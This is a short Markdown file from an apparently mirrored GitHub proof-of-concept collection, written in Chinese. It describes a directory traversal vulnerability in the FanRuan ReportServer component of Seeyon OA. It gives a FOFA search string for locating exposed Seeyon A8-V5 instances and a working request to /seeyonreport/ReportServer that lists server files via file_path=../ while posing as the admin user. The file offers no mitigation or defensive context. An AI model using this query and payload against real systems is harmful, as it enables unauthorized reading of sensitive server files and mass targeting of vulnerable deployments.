mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
17 lines
483 B
Markdown
17 lines
483 B
Markdown
|
## 致远OA帆软组件ReportServer目录遍历漏洞
|
|||
|
|
|
|||
|
|
致远OA 帆软组件 ReportServer接口存在目录遍历漏洞,攻击者通过漏洞可以获取服务器敏感信息
|
|||
|
|
|
|||
|
|
## fofa
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
title="致远A8-V5协同管理软件 V6.1sp1"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## poc
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../¤tUserName=admin¤tUserId=1&isWebReport=true
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|